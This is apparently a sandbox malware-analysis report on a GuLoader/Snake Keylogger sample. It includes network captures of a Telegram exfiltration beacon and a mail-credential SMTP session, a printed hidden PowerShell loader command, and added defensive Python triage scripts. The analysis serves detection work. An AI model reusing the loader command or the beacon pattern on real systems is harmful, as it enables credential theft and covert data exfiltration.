                                           Server: cloudflare
                                           CF-RAY: 8d6a095f3e01e932-DFW
                                           alt-svc: h3=":443"; ma=86400
                                           server-timing: cfL4;desc="?proto=TCP&rtt=2150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1396335&cwnd=246&unsent_bytes=0&cid=9742994c973b8a01&ts=150&x=0"
2024-10-22 14:04:27 UTC  366    IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                           Data Ascii: 167
                                                       <Response>
                                                           <IP>173.254.250.76</IP>
                                                           <CountryCode>US</CountryCode>
                                                           <CountryName>United States</CountryName>
                                                           <RegionCode>TX</RegionCode>
                                                           <RegionName>Texas</RegionName>
                                                           <City>Killeen</City>
                                                           <ZipCode>76549</ZipCode>
                                                           <TimeZone>America/Chicago</Time
2024-10-22 14:04:27 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID: 8 | Source: 192.168.2.10:49723 | Destination: 188.114.97.3:443 | PID: 6624 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction (data follows, indented)
2024-10-22 14:04:28 UTC | 63 bytes | OUT
    GET /xml/173.254.250.76 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-22 14:04:28 UTC | 891 bytes | IN
    HTTP/1.1 200 OK
    Date: Tue, 22 Oct 2024 14:04:28 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 31224
    Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeGFJJtpLY5sznbbO5W%2FAnofeI853Vv1BB55W4JSMN9fJSHjnM4TZWi7ADcf9GH4UoTeYNp0U2HWU3myB4eDOFfsTQiWH6fuZUth4FHGw%2BVBmXG06ElOfxEbt4KOGD8RLxWYftlX"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d6a09683d03ddaf-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2159582&cwnd=32&unsent_bytes=0&cid=93239ddee86ed841&ts=153&x=0"
2024-10-22 14:04:28 UTC | 366 bytes | IN
    Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:04:28 UTC | 5 bytes | IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 9 | Source: 192.168.2.10:49725 | Destination: 188.114.97.3:443 | PID: 6624 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction (data follows, indented)
2024-10-22 14:04:30 UTC | 87 bytes | OUT
    GET /xml/173.254.250.76 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-22 14:04:30 UTC | 898 bytes | IN
    HTTP/1.1 200 OK
    Date: Tue, 22 Oct 2024 14:04:30 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 31226
    Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beODQ5n7EpX7Rz5CaDvWtj2zTpVrF4eTJ8Av5JKQ%2BPBSCZhf%2FsvhYjrAU3N%2F8CaipRCf2WFxOugYe3N4KXU3gRaiO8EV97YhO%2FuQNxMwzH6h0effiIfI0%2B8JHu2hDhLc4cb0Kclr"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d6a09710c3ec872-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1081&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2427493&cwnd=252&unsent_bytes=0&cid=ba3e2a08c006e8eb&ts=146&x=0"
2024-10-22 14:04:30 UTC | 366 bytes | IN
    Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:04:30 UTC | 5 bytes | IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 10 | Source: 192.168.2.10:49727 | Destination: 188.114.97.3:443 | PID: 6624 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction (data follows, indented)
2024-10-22 14:04:31 UTC | 63 bytes | OUT
    GET /xml/173.254.250.76 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-22 14:04:31 UTC | 892 bytes | IN
    HTTP/1.1 200 OK
    Date: Tue, 22 Oct 2024 14:04:31 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 31227
    Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PokeJy02%2BLrsOLvNSmAetV0CeKheSp%2BRjgEaq9gDYsJuXnjmznquPg65fmznCWaiifTdmc9eUESi5e2RZCTBIFgxjve4G3QTjv0ienLTBCSxWWWfioT6nzS8shfpRXsL6sZ1SgK0"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d6a097a3c06e552-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2551541&cwnd=250&unsent_bytes=0&cid=a8f6698fd2b4ed9c&ts=150&x=0"
2024-10-22 14:04:31 UTC | 366 bytes | IN
    Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:04:31 UTC | 5 bytes | IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 11 | Source: 192.168.2.10:49728 | Destination: 149.154.167.220:443 | PID: 6624 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction (data follows, indented)
2024-10-22 14:04:32 UTC | 349 bytes | OUT
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-10-22 14:04:32 UTC | 344 bytes | IN
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Tue, 22 Oct 2024 14:04:32 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-22 14:04:32 UTC | 55 bytes | IN
    Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source IP:Port -> Dest IP:Port | Commands
Oct 22, 2024 16:04:39.782625914 CEST | 213.165.67.118:587 -> 192.168.2.10:49729 | 220 kundenserver.de (mreue107) Nemesis ESMTP Service ready
Oct 22, 2024 16:04:39.787214994 CEST | 192.168.2.10:49729 -> 213.165.67.118:587 | EHLO 472847
Oct 22, 2024 16:04:40.036479950 CEST | 213.165.67.118:587 -> 192.168.2.10:49729 | 250-kundenserver.de Hello 472847 [173.254.250.76]
    250-8BITMIME
    250-SIZE 141557760
    250 STARTTLS
Oct 22, 2024 16:04:40.036618948 CEST | 192.168.2.10:49729 -> 213.165.67.118:587 | STARTTLS
Oct 22, 2024 16:04:40.291269064 CEST | 213.165.67.118:587 -> 192.168.2.10:49729 | 220 OK
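The three channels in the sessions above are what a detection keys on: the injected msiexec.exe asks reallyfreegeoip.org about its own public IP, then sends a Telegram Bot API sendMessage beacon whose bot token and chat_id are both empty (consistent with the 404 the API returned), and then opens an SMTP submission session to kundenserver.de on port 587 whose EHLO name is the same PC name the beacon carried. The following Python is an added example, not part of the Joe Sandbox report or of the sample; its input rows are constructed by copying the Host headers, request lines and client SMTP commands from the records above, and the field names it extracts from the Telegram message (PC Name, Date and Time, Country Name) are those of this one capture:

```python
"""Triage pass over the network records of this analysis.

Added example, not part of the Joe Sandbox report. The rows below are
constructed by copying the Host headers, request lines and SMTP commands
from the sessions shown on the page, so the script runs offline. Field
names inside the Telegram beacon are taken from this one sample's message;
other Snake Keylogger builds may format it differently.
"""
import re
from urllib.parse import urlsplit, parse_qs

GEOIP_HOSTS = {"reallyfreegeoip.org"}                        # victim-geolocation lookups
TELEGRAM_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>\w+)$")
SMTP_HELLO = re.compile(r"^(?:EHLO|HELO)\s+(\S+)", re.IGNORECASE)

# Constructed from the report: (process, Host header, request line)
HTTP_ROWS = [
    ("msiexec.exe", "reallyfreegeoip.org", "GET /xml/173.254.250.76 HTTP/1.1"),
    ("msiexec.exe", "api.telegram.org",
     "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0A"
     "Date%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United"
     "%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20"
     "nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1"),
]
# Constructed from the report: client-to-server SMTP commands (src, dst, dst port, command)
SMTP_CLIENT_ROWS = [
    ("192.168.2.10", "213.165.67.118", 587, "EHLO 472847"),
    ("192.168.2.10", "213.165.67.118", 587, "STARTTLS"),
]


def parse_beacon(text):
    """Split the CRLF-separated 'Key: value' lines the keylogger packs into ?text=."""
    fields = {}
    for line in text.split("\r\n"):
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def classify_http(process, host, request_line):
    """Return a finding for one request, or None when the request is uninteresting."""
    _method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    if host in GEOIP_HOSTS:
        # The sample resolves its own public IP before exfiltrating anything.
        return {"kind": "geoip_lookup", "process": process,
                "looked_up_ip": url.path.rstrip("/").rsplit("/", 1)[-1]}
    if host == "api.telegram.org":
        m = TELEGRAM_PATH.match(url.path)
        if m is None:
            return None
        query = parse_qs(url.query, keep_blank_values=True)   # parse_qs already URL-decodes
        return {"kind": "telegram_beacon", "process": process,
                "api_method": m["method"],
                "token_present": bool(m["token"]),   # empty in this capture, consistent with the 404
                "chat_id": query.get("chat_id", [""])[0],
                "fields": parse_beacon(query.get("text", [""])[0])}
    return None


def classify_smtp(rows):
    """Summarise a port-587 submission session: EHLO name and whether TLS was negotiated."""
    finding = {"kind": "smtp_submission", "server": None, "ehlo_name": None, "starttls": False}
    for _src, dst, port, command in rows:
        if port != 587:
            continue
        finding["server"] = dst
        hello = SMTP_HELLO.match(command)
        if hello:
            finding["ehlo_name"] = hello.group(1)
        if command.strip().upper() == "STARTTLS":
            finding["starttls"] = True
    return finding


def same_victim(http_findings, smtp_finding):
    """True when the EHLO name equals the PC Name sent to Telegram (one host, two channels)."""
    names = {f["fields"].get("PC Name")
             for f in http_findings if f and f["kind"] == "telegram_beacon"}
    return smtp_finding["ehlo_name"] is not None and smtp_finding["ehlo_name"] in names


def run():
    http = [classify_http(*row) for row in HTTP_ROWS]
    smtp = classify_smtp(SMTP_CLIENT_ROWS)
    return {"http": http, "smtp": smtp, "same_victim": same_victim(http, smtp)}


if __name__ == "__main__":
    import json
    print(json.dumps(run(), indent=2))
```

The geolocation lookup on its own is weak evidence (legitimate software does it too); the combination of that lookup, a Bot API call from a non-browser process such as msiexec.exe, and an outbound port-587 session whose EHLO name matches the beaconed PC name is what makes the pattern worth alerting on. Because the SMTP session upgrades to TLS right after EHLO, only the greeting and the server capabilities are visible on the wire; the credentials and message body the report flags under "Tries to steal Mail credentials" travel inside the encrypted part.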


                                                                                          Target ID:0
                                                                                          Start time:10:03:11
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Rundholterne89.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:891'148 bytes
                                                                                          MD5 hash:A1E239C4D5116E289CE0597A92844EDE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:10:03:14
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
                                                                                          Imagebase:0x6b0000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1886651504.000000000936D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:10:03:14
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff620390000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:10:04:02
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                          Imagebase:0xcc0000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false
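The Target ID 2 command line is the GuLoader unpacking stage the report flags as "suspicious powershell code related to unpacking": it reads a dropped file (Exungulate.Spe205) as a single string, takes the three characters at offset 55438 as a command name, and invokes that command with the whole file as its argument, so the actual verb never appears on the command line. The following Python is an added triage helper, not the report's or the malware's code. The stage file is not on this page, so the script builds a constructed stand-in with a hypothetical 'iex' (the Invoke-Expression alias) at that offset, and the cp1252 decoding is an assumption about the sandbox host's ANSI code page:

```python
"""Static triage of the GuLoader PowerShell stage launched as Target ID 2.

Added example, not part of the Joe Sandbox report. It pulls the Get-Content
path and the SubString(offset, length) arguments out of the command line and
then reproduces the character lookup against a file. The real stage file is
not on this page, so a stand-in is constructed with a hypothetical 'iex' at
the real offset; on a live case, pass the bytes of the dropped file instead.
"""
import re

# Copied from the report's Target ID 2 entry.
COMMANDLINE = r'''"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"'''

# Pattern: $var = Get-Content -raw '<path>'; $cmd = $var.SubString(off,len); .$cmd($var)
STAGE_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*Get-Content\s+-raw\s+'(?P<path>[^']+)'.*?"
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P=var)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\).*?"
    r"\.\$(?P=cmd)\(\$(?P=var)\)",
    re.IGNORECASE | re.DOTALL,
)


def parse_stage(cmdline):
    """Detect the read/substring/dispatch pattern; return its parameters or None."""
    m = STAGE_RE.search(cmdline)
    if m is None:
        return None
    return {"path": m["path"], "offset": int(m["off"]), "length": int(m["len"]),
            "hidden_window": "-windowstyle hidden" in cmdline.lower()}


def resolve_dispatch(stage_text, offset, length):
    """Replicate [string].SubString(offset, length) on the decoded file text."""
    if offset + length > len(stage_text):
        raise ValueError("stage text shorter than offset+length: wrong file or encoding")
    return stage_text[offset:offset + length]


def triage(cmdline, stage_bytes, encoding="cp1252"):
    """Windows PowerShell 5.1 Get-Content without -Encoding reads a BOM-less file
    as ANSI text, and SubString indexes characters of that text, not bytes.
    Decode the same way before slicing (assumption: the host uses code page 1252)."""
    info = parse_stage(cmdline)
    if info is None:
        return None
    text = stage_bytes.decode(encoding)
    info["dispatch"] = resolve_dispatch(text, info["offset"], info["length"])
    return info


def build_constructed_stage(offset, token):
    """Constructed stand-in for the .Spe205 file: filler up to `offset`, then `token`."""
    filler = "# constructed placeholder for the obfuscated GuLoader stage\n"
    prefix = (filler * (offset // len(filler) + 1))[:offset]
    return (prefix + token + "\n" + filler).encode("cp1252")


if __name__ == "__main__":
    stage = build_constructed_stage(55438, "iex")   # hypothetical token, see lead-in
    print(triage(COMMANDLINE, stage))
```

Two practical caveats follow from how the stage works. SubString counts characters of the decoded string, so if the dropped file carries a BOM, Get-Content honours it and a byte-offset slice of the raw file lands on the wrong characters; decode with the encoding PowerShell would have used and only then slice. And because the rest of the file is passed to the resolved command as data, the decisive artefact for analysis is the dropped file itself, which is why the report's "Powershell drops PE file" and the Yara hit on the powershell.exe memory region (Target ID 2) matter more than the one-liner.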


                                                                                            Execution Graph

                                                                                            Execution Coverage:25.1%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:23.4%
                                                                                            Total number of Nodes:1199
                                                                                            Total number of Limit Nodes:40
[Execution graph: the interactive node and edge listing (node id, code address, called APIs, edges) is not rendered in this text extract and is cut off mid-listing. The visible nodes are code addresses in the 0x401000-0x406200 range, consistent with the 0x400000 image base of Target ID 0, and the APIs named on them are: GetDlgItem, SendMessageA, SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongA, GetWindowLongA, SetClassLongA, EndDialog, CreateDialogParamA, SetDlgItemTextA, SetWindowTextA, GetWindowRect, ScreenToClient, IsWindowEnabled, EnableWindow, GetSystemMenu, EnableMenuItem, GetSysColor, SetBkMode, SetTextColor, SetBkColor, CreateBrushIndirect, DeleteObject, ImageList_Destroy, InvalidateRect, KiUserCallbackDispatcher, lstrcpynA, lstrlenA, lstrcatA, wsprintfA, CharNextA, CharPrevA, MulDiv, GetVersion, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, CreateProcessA, WaitForSingleObject, GetExitCodeProcess, CloseHandle, PeekMessageA, DispatchMessageA, FindClose, GlobalFree.]
SendMessageA SendMessageA 2902->2903 2903->2897 2903->2902 2904->2896 2905->2854 2907 404872 SendMessageA 2906->2907 2908 404836 GetMessagePos ScreenToClient SendMessageA 2906->2908 2909 40486a 2907->2909 2908->2909 2910 40486f 2908->2910 2909->2884 2910->2907 2923 405d2f lstrcpynA 2911->2923 2913 4048a6 2924 405c8d wsprintfA 2913->2924 2915 4048b0 2916 40140b 2 API calls 2915->2916 2917 4048b9 2916->2917 2925 405d2f lstrcpynA 2917->2925 2919 4048c0 2919->2900 2926 404709 2920->2926 2922 4047e3 2922->2872 2923->2913 2924->2915 2925->2919 2927 40471f 2926->2927 2928 405d51 18 API calls 2927->2928 2929 404783 2928->2929 2930 405d51 18 API calls 2929->2930 2931 40478e 2930->2931 2932 405d51 18 API calls 2931->2932 2933 4047a4 lstrlenA wsprintfA SetDlgItemTextA 2932->2933 2933->2922 3505 4022c7 3506 402a3a 18 API calls 3505->3506 3507 4022d8 3506->3507 3508 402a3a 18 API calls 3507->3508 3509 4022e1 3508->3509 3510 402a3a 18 API calls 3509->3510 3511 4022eb GetPrivateProfileStringA 3510->3511 3512 4028c8 InvalidateRect 3513 4028cf 3512->3513 2970 401bca 2971 402a1d 18 API calls 2970->2971 2972 401bd1 2971->2972 2973 402a1d 18 API calls 2972->2973 2974 401bdb 2973->2974 2975 401beb 2974->2975 2976 402a3a 18 API calls 2974->2976 2977 401bfb 2975->2977 2978 402a3a 18 API calls 2975->2978 2976->2975 2979 401c06 2977->2979 2980 401c4a 2977->2980 2978->2977 2982 402a1d 18 API calls 2979->2982 2981 402a3a 18 API calls 2980->2981 2983 401c4f 2981->2983 2984 401c0b 2982->2984 2985 402a3a 18 API calls 2983->2985 2986 402a1d 18 API calls 2984->2986 2987 401c58 FindWindowExA 2985->2987 2988 401c14 2986->2988 2991 401c76 2987->2991 2989 401c3a SendMessageA 2988->2989 2990 401c1c SendMessageTimeoutA 2988->2990 2989->2991 2990->2991 3407 401751 3408 402a3a 18 API calls 3407->3408 3409 401758 3408->3409 3410 401776 3409->3410 3411 40177e 3409->3411 3446 405d2f lstrcpynA 3410->3446 3447 405d2f lstrcpynA 3411->3447 3414 40177c 3418 405f9a 5 API calls 3414->3418 3415 401789 3416 4057a1 3 
API calls 3415->3416 3417 40178f lstrcatA 3416->3417 3417->3414 3438 40179b 3418->3438 3419 406033 2 API calls 3419->3438 3420 40597d 2 API calls 3420->3438 3422 4017b2 CompareFileTime 3422->3438 3423 401876 3424 404f48 25 API calls 3423->3424 3426 401880 3424->3426 3425 40184d 3427 404f48 25 API calls 3425->3427 3435 401862 3425->3435 3429 402e9f 32 API calls 3426->3429 3427->3435 3428 405d2f lstrcpynA 3428->3438 3430 401893 3429->3430 3431 4018a7 SetFileTime 3430->3431 3433 4018b9 CloseHandle 3430->3433 3431->3433 3432 405d51 18 API calls 3432->3438 3434 4018ca 3433->3434 3433->3435 3436 4018e2 3434->3436 3437 4018cf 3434->3437 3440 405d51 18 API calls 3436->3440 3439 405d51 18 API calls 3437->3439 3438->3419 3438->3420 3438->3422 3438->3423 3438->3425 3438->3428 3438->3432 3441 405525 MessageBoxIndirectA 3438->3441 3445 4059a2 GetFileAttributesA CreateFileA 3438->3445 3442 4018d7 lstrcatA 3439->3442 3443 4018ea 3440->3443 3441->3438 3442->3443 3444 405525 MessageBoxIndirectA 3443->3444 3444->3435 3445->3438 3446->3414 3447->3415 3517 401651 3518 402a3a 18 API calls 3517->3518 3519 401657 3518->3519 3520 406033 2 API calls 3519->3520 3521 40165d 3520->3521 3522 401951 3523 402a1d 18 API calls 3522->3523 3524 401958 3523->3524 3525 402a1d 18 API calls 3524->3525 3526 401962 3525->3526 3527 402a3a 18 API calls 3526->3527 3528 40196b 3527->3528 3529 40197e lstrlenA 3528->3529 3530 4019b9 3528->3530 3531 401988 3529->3531 3531->3530 3535 405d2f lstrcpynA 3531->3535 3533 4019a2 3533->3530 3534 4019af lstrlenA 3533->3534 3534->3530 3535->3533 3536 404352 3537 40437e 3536->3537 3538 40438f 3536->3538 